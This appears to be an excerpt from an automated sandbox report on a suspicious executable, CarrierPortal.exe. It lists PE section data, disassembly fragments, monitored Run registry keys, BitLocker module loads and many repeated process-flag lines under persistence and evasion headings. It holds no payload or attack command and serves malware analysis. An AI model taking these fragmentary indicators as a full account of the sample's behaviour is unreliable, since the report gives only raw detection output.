Source: Binary string: BasicDisplay.pdbUGP source: dxdiag.exe, 00000004.00000003.1198351485.000001D76470D000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000015.00000003.1729056136.00000143D2092000.00000004.00000020.00020000.00000000.sdmp
Source: CarrierPortal.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: CarrierPortal.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: CarrierPortal.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: CarrierPortal.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: CarrierPortal.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: CarrierPortal.exeStatic PE information: section name: .rodata
Source: CarrierPortal.exeStatic PE information: section name: .svm_hea
Source: C:\Users\user\Desktop\CarrierPortal.exeCode function: 0_2_0000002D0D5CE968 push ecx; retf 0_2_0000002D0D5CE969
Source: C:\Users\user\Desktop\CarrierPortal.exeCode function: 0_2_0000002D0D5CF1E2 push eax; iretd 0_2_0000002D0D5CF20A
Source: C:\Users\user\Desktop\CarrierPortal.exeCode function: 0_2_0000002D0D5CEA9F push ecx; retf 0_2_0000002D0D5CEAA9
Source: C:\Users\user\Desktop\CarrierPortal.exeCode function: 0_2_0000002D0D5CC772 push ecx; retf 0_2_0000002D0D5CC779
Source: C:\Users\user\Desktop\CarrierPortal.exeCode function: 0_2_0000002D0D5CBEB0 push ecx; retf 0_2_0000002D0D5CBEB9
Source: C:\Users\user\Desktop\CarrierPortal.exeCode function: 0_2_00000146244BF1D4 push eax; retf 0_2_00000146244BF1E9
Source: C:\Users\user\Desktop\CarrierPortal.exeCode function: 0_2_00000146244D8468 pushad ; ret 0_2_00000146244D8469
Source: C:\Users\user\Desktop\CarrierPortal.exeCode function: 0_2_00000146244D9708 pushad ; retf 0_2_00000146244D9709
Source: C:\Users\user\Desktop\CarrierPortal.exeCode function: 0_2_00000146244D9FA1 pushad ; ret 0_2_00000146244D9FC1
Source: C:\Users\user\Desktop\CarrierPortal.exeCode function: 0_2_00000146250236C0 push edi; retf 0_2_00000146250236C1
Source: C:\Users\user\Desktop\CarrierPortal.exeCode function: 0_2_00000146250A390C push esp; retf 0006h0_2_00000146250A390D
Source: C:\Users\user\Desktop\CarrierPortal.exeCode function: 18_2_000000986673C888 push ecx; retf 18_2_000000986673C889
Source: C:\Users\user\Desktop\CarrierPortal.exeCode function: 18_2_000000986673EA78 push ecx; retf 18_2_000000986673EA79
Source: C:\Users\user\Desktop\CarrierPortal.exeCode function: 18_2_000000986673EBB8 push ecx; retf 18_2_000000986673EBB9
Source: C:\Users\user\Desktop\CarrierPortal.exeCode function: 18_2_000000986673F318 push eax; iretd 18_2_000000986673F31A
Source: C:\Users\user\Desktop\CarrierPortal.exeCode function: 18_2_000001E7771705D8 pushad ; retf 18_2_000001E7771705D9

Boot Survival

barindex
Monitors registry run keys for changes
Source: C:\Windows\System32\Taskmgr.exeRegistry key monitored: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: C:\Windows\System32\Taskmgr.exeRegistry key monitored: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run
Source: C:\Windows\System32\Taskmgr.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Hooking and other Techniques for Hiding and Protection

barindex
Loading BitLocker PowerShell Module
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\CarrierPortal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\CarrierPortal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOX
